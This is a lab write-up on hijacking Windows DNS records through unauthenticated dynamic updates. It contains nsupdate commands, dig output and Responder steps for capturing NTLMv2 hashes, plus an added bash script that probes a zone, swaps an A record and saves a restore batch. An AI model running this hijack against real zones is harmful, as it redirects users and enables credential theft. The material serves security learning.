Insecure Dynamic DNS Updates

dns, windows, foothold

What are Dynamic DNS Updates? #

Dynamic DNS update (RFC 2136) lets a client send a DNS UPDATE message to the authoritative server to add or delete records in a zone, which is how Windows hosts register their own A and PTR records when they obtain an address. Zones that are integrated with Active Directory normally use secure dynamic update (GSS-TSIG), where the server only accepts an update that is signed with the sender's Kerberos credentials. A zone configured for "Nonsecure and secure" dynamic updates also accepts updates that carry no signature at all, so anyone who can reach the server on port 53 can change it.

Vulnerability #

When the zone accepts nonsecure updates, an unauthenticated attacker can delete the A record of a hostname the users already visit (here selfservice.windcorp.thm) and add a new one that points at their own IP. Every client that resolves the name after that connects to the attacker instead of the real server, still believing it is talking to the legitimate host, so the attacker can serve a fake copy of the service or, as below, point Responder at it to capture the NTLM authentication the clients send.

Steps #

Query the name first and note the original address, so the record can be restored afterwards. Then replace it with nsupdate, without supplying any key, which is exactly what a nonsecure zone allows. `update delete` without a record type removes every record at that name; the second `send` adds our address with a TTL of 1234 seconds:

```
➜ nsupdate
> server 10.10.23.72
> update delete selfservice.windcorp.thm
> send
> update add selfservice.windcorp.thm 1234 A 10.11.40.33
> send
> quit
```

Confirm from the attack box that the server now answers with our address (`thm` is an alias for 10.10.23.72 here). The `aa` flag shows the answer comes from the authoritative server, not from a cache, and the TTL of 1234 is the one we set:

```
➜  ra2 dig selfservice.windcorp.thm a @thm

; <<>> DiG 9.16.15-Debian <<>> selfservice.windcorp.thm a @thm
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 57355
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;selfservice.windcorp.thm.	IN	A

;; ANSWER SECTION:
selfservice.windcorp.thm. 1234	IN	A	10.11.40.33

;; Query time: 188 msec
;; SERVER: 10.10.23.72#53(10.10.23.72)
;; WHEN: Sat Sep 18 08:00:02 EDT 2021
;; MSG SIZE  rcvd: 69
```

Now listen on the hijacked name. The self-service portal is reached over HTTPS, so Responder needs a certificate. Responder.conf already points at `certs/crt.pem` and `certs/key.pem` relative to its install directory, so a certificate and key pair (self-signed is fine) just has to be copied there under those two names before starting Responder on the VPN interface:

```
sudo cp *pem /usr/share/responder/certs/
➜  scans cat /etc/responder/Responder.conf | grep cert
SSLCert = certs/crt.pem
SSLKey = certs/key.pem
sudo responder -I tun0
```

When a user opens https://selfservice.windcorp.thm the connection lands on Responder's HTTPS server, which demands authentication and logs the NTLMv2 response for offline cracking. The certificate is not trusted by the clients, so the capture depends on a user clicking through the browser warning or on a client that does not validate the certificate.
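
The DNS half of the procedure as one script, added here as an example and not part of the original write-up. It probes the zone with a throwaway TXT record before touching anything, records the original A answers so the hijack can be undone, performs the replacement and verifies it with dig. The server address, zone and hostnames are assumptions taken from the lab above, the canary name `ddns-probe-<pid>` is invented, and nsupdate, dig and awk are assumed to be installed on the attack box:

```bash
#!/usr/bin/env bash
# Added example, not from the original write-up: probe a zone for
# unauthenticated dynamic updates, hijack an A record, verify it with dig,
# and keep a batch that restores the original answers. Server, zone and
# record names are assumptions taken from the lab above; nsupdate, dig and
# awk are assumed to be present on the attack box.

DNS_SERVER=${DNS_SERVER:-10.10.23.72}
ZONE=${ZONE:-windcorp.thm}

# nsupdate batch that replaces the A records of $name with $ip.
# Deleting only the A RRset (rather than the whole name, as a bare
# "update delete name" would) leaves unrelated records alone. Deleting
# first matters: "update add" on its own keeps the real address in the
# RRset and clients would round-robin between victim and attacker.
hijack_script() {
  local name=$1 ip=$2 ttl=${3:-60}
  printf 'server %s\nzone %s\nupdate delete %s A\nupdate add %s %s A %s\nsend\n' \
    "$DNS_SERVER" "$ZONE" "$name" "$name" "$ttl" "$ip"
}

# nsupdate batch that puts the original A records back (one per extra argument).
restore_script() {
  local name=$1 ttl=$2 ip
  shift 2
  printf 'server %s\nzone %s\nupdate delete %s A\n' "$DNS_SERVER" "$ZONE" "$name"
  for ip in "$@"; do
    printf 'update add %s %s A %s\n' "$name" "$ttl" "$ip"
  done
  printf 'send\n'
}

# Read dig output on stdin and print the A answers for $name, one per line.
# Question-section lines start with ';' so they never match the owner name.
answer_ips() {
  local name=${1%.}.
  awk -v n="$name" '$1 == n && $4 == "A" { print $5 }'
}

# True when the dig output on stdin resolves $name to exactly $ip and nothing else.
points_at() {
  local name=$1 ip=$2
  [ "$(answer_ips "$name")" = "$ip" ]
}

# Send an unsigned update for a throwaway TXT record and remove it again.
# A "Secure only" zone (GSS-TSIG required) rejects the unsigned UPDATE and
# nsupdate prints "update failed: REFUSED"; a nonsecure zone accepts it
# silently. Nothing that clients depend on is modified by the probe.
probe_insecure_update() {
  local canary="ddns-probe-$$.$ZONE" out
  out=$(printf 'server %s\nzone %s\nupdate add %s 1 TXT "probe"\nsend\nupdate delete %s TXT\nsend\n' \
    "$DNS_SERVER" "$ZONE" "$canary" "$canary" | nsupdate 2>&1) || true
  if [ -n "$out" ]; then
    printf 'probe rejected: %s\n' "$out" >&2
    return 1
  fi
}

# dig output copied from the write-up above, kept here so the parsing
# helpers can be exercised without a live server.
SAMPLE_DIG='; <<>> DiG 9.16.15-Debian <<>> selfservice.windcorp.thm a @thm
;; QUESTION SECTION:
;selfservice.windcorp.thm.      IN      A

;; ANSWER SECTION:
selfservice.windcorp.thm. 1234  IN      A       10.11.40.33

;; SERVER: 10.10.23.72#53(10.10.23.72)'

# Usage: ./ddns_hijack.sh --run selfservice.windcorp.thm 10.11.40.33
if [ "${1:-}" = "--run" ]; then
  name=${2:?hostname to hijack} new_ip=${3:?address to point it at}
  probe_insecure_update && echo "[+] $ZONE accepts unsigned dynamic updates"
  orig=$(dig +noall +answer "$name" A @"$DNS_SERVER" | answer_ips "$name")
  echo "[*] current A records for $name: ${orig:-none}"
  # shellcheck disable=SC2086  # splitting $orig into one IP per argument is intended
  restore_script "$name" 60 $orig > "restore-$name.nsupdate"
  hijack_script "$name" "$new_ip" 60 | nsupdate
  if dig +noall +answer "$name" A @"$DNS_SERVER" | points_at "$name" "$new_ip"; then
    echo "[+] $name now resolves to $new_ip; undo with: nsupdate restore-$name.nsupdate"
  else
    echo "[-] hijack not visible yet" >&2
  fi
fi
```

Run it with `--run <name> <ip>` only against a zone you are authorised to modify; the probe alone is enough to confirm the misconfiguration during an assessment, and the saved `restore-<name>.nsupdate` batch is what you feed back into nsupdate to clean up when the engagement is over.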